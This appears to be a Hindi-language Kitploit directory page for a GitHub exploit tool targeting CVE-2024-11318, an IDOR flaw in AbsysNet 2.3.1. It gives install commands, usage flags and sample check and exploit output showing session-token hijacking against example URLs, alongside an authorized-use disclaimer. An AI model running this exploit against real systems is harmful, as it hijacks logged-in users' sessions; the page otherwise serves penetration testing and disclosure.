Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-11318 — This repository details an IDOR vulnerability in AbsysNet 2.3.1, which allows a remote attacker to brute-force session IDs via the /cgi-bin/ocap/ endpoint. Successful exploitation can compromise active user sessions, exposing authentication tokens in HTML. The attack is limited to active sessions and is terminated if the user logs out. | Kitploit
उपकरण/GitHubGitHub/xthalach/cve-2024-11318
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubxthalach/cve-2024-11318

CVE-2024-11318

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

This repository details an IDOR vulnerability in AbsysNet 2.3.1, which allows a remote attacker to brute-force session IDs via the /cgi-bin/ocap/ endpoint. Successful exploitation can compromise active user sessions, exposing authentication tokens in HTML. The attack is limited to active sessions and is terminated if the user logs out.

वेबसाइट
साझा करें

CVE-2024-11318 (IDOR - AbsysNet 2.3.1 उपयोगकर्ता हाईजैकिंग)


अस्वीकरण

यह उपकरण यह पहचानने और शोषण करने में मदद करने के लिए डिज़ाइन किया गया है कि क्या कोई एप्लिकेशन इस विशिष्ट CVE-2024-11318 के लिए संवेदनशील है। इसका उद्देश्य साइबर सुरक्षा पेशेवरों, शोधकर्ताओं और पैठ परीक्षकों द्वारा उन वातावरणों में सुरक्षा का आकलन करना है जहाँ उनके पास स्पष्ट प्राधिकरण है।

यदि भेद्यता की पुष्टि हो जाती है, तो शोषण केवल तभी किया जाना चाहिए यदि आपके पास एप्लिकेशन या सिस्टम स्वामी से उचित प्राधिकरण हो।

इस उपकरण का उन सिस्टमों या नेटवर्कों के खिलाफ अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। लेखक इस उपकरण के दुरुपयोग या इससे होने वाली क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

इस उपकरण का उपयोग करके, आप सभी प्रासंगिक कानूनों और नैतिक मानकों का पालन करने के लिए सहमत हैं। परीक्षण करने या भेद्यताओं का शोषण करने से पहले हमेशा स्पष्ट अनुमति सुनिश्चित करें।


विवरण

यह भेद्यता AbsysNet संस्करण 2.3.1 को प्रभावित करती है और एक दूरस्थ हमलावर को एक सक्रिय उपयोगकर्ता के सत्र से समझौता करने की अनुमति देती है। हमले में /cgi-bin/ocap/ एंडपॉइंट में एक IDOR (असुरक्षित प्रत्यक्ष वस्तु संदर्भ) भेद्यता का शोषण करना शामिल है, जहाँ सत्र पहचानकर्ता बल-प्रयोग (brute-forcing) के लिए संवेदनशील है।

एक प्रमाणित उपयोगकर्ता से जुड़े सत्र आईडी का सफलतापूर्वक मिलान करने पर, प्रमाणीकरण टोकन HTML कोड में उजागर हो जाता है। हालाँकि, हमला केवल सक्रिय सत्रों तक सीमित है, और यदि प्रभावित उपयोगकर्ता लॉग आउट करता है, तो हमलावर की पहुँच तुरंत समाप्त हो जाती है, जिससे समझौते की स्थिरता सीमित हो जाती है।

इस भेद्यता से केवल उन उपयोगकर्ता सत्रों का अपहरण संभव है जो वर्तमान में लॉग इन हैं, और यदि वर्तमान उपयोगकर्ता लॉग ऑफ करता है तो हमलावर कनेक्शन खो देता है।


स्थापना

root@kitploit:~
git clone https://github.com/xthalach/CVE-2024-11318.git
cd CVE-2024-11318
python3 -m venv cve-2024-11318
source cve-2024-11318/bin/activate
pip install -r requirements.txt
python3 cve-2024-11318.py

उपयोग

root@kitploit:~
python3 cve-2024-11318.py 

                                                                                                                                                                      
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 

    ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
    ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
    ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
    
usage: CVE-2024-11318.py [-h] -u URL [--check] [--exploit]

यह स्क्रिप्ट आपको यह आकलन करने की अनुमति देती है कि कोई वेबसाइट CVE-2024-11318 के लिए संवेदनशील है या नहीं। यदि पुष्टि होती है, तो यह भेद्यता का शोषण करने का विकल्प प्रदान करती है, लेकिन केवल उन परिस्थितियों में जहाँ आपके पास ऐसा करने का स्पष्ट प्राधिकरण हो।

options:
  -h, --help         यह सहायता संदेश दिखाएँ और बाहर निकलें
  -u URL, --url URL  लक्ष्य URL
  --check            इस स्क्रिप्ट में यह विकल्प आपको यह परीक्षण करने की अनुमति देता है कि कोई वेबसाइट CVE-2024-11318 के लिए संवेदनशील है या नहीं।
  --exploit          इस स्क्रिप्ट में यह विकल्प आपको CVE-2024-11318 भेद्यता का शोषण करने में सक्षम बनाता है।

--जांच

  • संवेदनशील
root@kitploit:~
└─$ python3 CVE-2024-11318.py -u 'https://www.contoso.com/cgi-bin/opac/O7375/ID009a7a6e?ACC=101' --check
                                                                                                                                                                      
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 

    ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
    ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
    ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
    
[|] हमला शुरू: लक्ष्य संवेदनशील है या नहीं इसकी जाँच!
[*] URL जाँच रहा है: https://www.contoso.com/cgi-bin/opac/O7375/?ACC=101
[+] संवेदनशील: टोकन 'ID009a7a6e' HTML कोड में पाया गया है।

  • संवेदनशील नहीं
root@kitploit:~
└─$ python3 CVE-2024-11318.py -u 'https://contoso.com/cgi-bin/abnetopac/O7fbxZNd3yjeqX7isbLYjGeEUqX?ACC=101' --check
                                                                                                                                                                      
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 

    ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
    ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
    ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
    
[q] हमला शुरू: लक्ष्य संवेदनशील है या नहीं इसकी जाँच!
[←] URL जाँच रहा है: https://contoso.com/cgi-bin/abnetopac/O7fbxZNd3yjeqX7isbLYjGeEUqX?ACC=101
[-] संवेदनशील नहीं: एप्लिकेशन को पैच कर दिया गया है, टोकन मान "O7fbxZNd3yjeqX7isbLYjGeEUqX" मेल नहीं खाता।

--शोषण

root@kitploit:~
└─$ python3 CVE-2024-11318.py -u 'https://www.contoso.com/cgi-bin/opac/O7067/ID5c22d860?ACC=101' --exploit
                                                                                                                                                                      
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 

    ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
    ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
    ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
    
[█] हमला शुरू: लक्ष्य का शोषण!
[*] --- शोषण शुरू ---
[b] URL: https://www.contoso.com/cgi-bin/opac/O7099/?ACC=101
[+] उपयोगकर्ता टोकन हाईजैकिंग: https://www.contoso.com/cgi-bin/opac/O7054/ID9f842d80?ACC=101 (ब्राउज़र में कॉपी और पेस्ट करें)

टूल डाउनलोड करें